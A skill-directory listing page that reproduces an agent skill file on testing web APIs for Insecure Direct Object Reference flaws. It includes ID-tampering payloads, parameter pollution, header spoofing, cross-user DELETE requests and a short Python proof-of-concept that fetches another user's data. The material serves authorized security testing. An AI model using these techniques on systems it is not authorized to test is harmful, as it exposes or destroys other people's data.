smithery.ai

idor

Insecure Direct Object Reference testing for broken access control

First seen Apr 10, 2026

Installation

$ npx skills add https://smithery.ai

Similar popular skills

Related neighbors and high-traction skills in the same topics — useful to compare before installing.

Also in this package

Other skills from smithery.ai · top by installs.

npx skills add https://smithery.ai

Browse all from smithery.ai

More details

Agent compatibility

Declared targets from SKILL.md / docs. Unmarked agents are not listed — the skill may still install via the CLI.

Claude Code Not declared
Cursor Not declared
Codex Not declared
GitHub Copilot Not declared
Windsurf Not declared
Gemini CLI Not declared
Cline Not declared
OpenCode Not declared

Skill metadata

Parsed from SKILL.md frontmatter.

Version1.0.0

Package contents

Files included with this skill beyond the listing page.

  • skill md SKILL.md 2,554 B
  • docs SUMMARY.md 78 B

History

  1. First seen on skills.sh
  2. First recorded snapshot · 1 installs

SKILL.md

IDOR Testing Methodology

Overview

IDOR occurs when an application uses user-supplied input to access objects directly without proper authorization checks.

Types

  1. Horizontal IDOR: Access other users' data at same privilege level
  2. Vertical IDOR: Access higher privilege resources

Testing Methodology

1. Identify Object References

  • Numeric IDs: /api/users/123
  • UUIDs: /api/orders/550e8400-e29b-41d4-a716-446655440000
  • Encoded IDs: Base64, Hashes
  • File names: /documents/report_123.pdf

2. Common Endpoints to Test

/api/users/{id}
/api/orders/{id}
/api/invoices/{id}
/api/documents/{id}
/api/accounts/{id}
/api/profiles/{id}
/api/messages/{id}
/api/transactions/{id}

3. ID Manipulation

# Numeric
123 → 124, 122, 0, 1, -1, 999999

# Sequential
Replace your ID with another user's ID

# UUID
Generate valid UUID format
Try null UUID: 00000000-0000-0000-0000-000000000000

# Encoded
Decode, modify, re-encode

4. HTTP Method Tampering

GET /api/users/123 → Try with different user ID
PUT /api/users/123 → Try updating another user
DELETE /api/users/123 → Try deleting another user

5. Parameter Pollution

/api/users?id=123&id=456
/api/users?id=123,456
/api/users?id[]=123&id[]=456

6. JSON Body Manipulation

// Original
{"user_id": 123, "action": "view"}

// Modified
{"user_id": 456, "action": "view"}

7. Header Manipulation

X-User-ID: 456
X-Original-User: 456

PoC Template

import requests

def test_idor(base_url, endpoint, my_id, other_id, auth_token):
    headers = {"Authorization": f"Bearer {auth_token}"}
    
    # Access own resource
    r1 = requests.get(f"{base_url}{endpoint}/{my_id}", headers=headers)
    
    # Try accessing other user's resource
    r2 = requests.get(f"{base_url}{endpoint}/{other_id}", headers=headers)
    
    if r2.status_code == 200:
        print(f"[+] IDOR found! Accessed user {other_id}'s data")
        print(f"Response: {r2.json()}")
        return True
    return False

Indicators of IDOR

  • 200 OK with different user's data
  • Response contains PII of other users
  • Sensitive data without permission check
  • Same response structure but different data

Impact

  • Access other users' personal data
  • Modify other users' settings
  • Delete other users' resources
  • Financial fraud
  • Privacy violations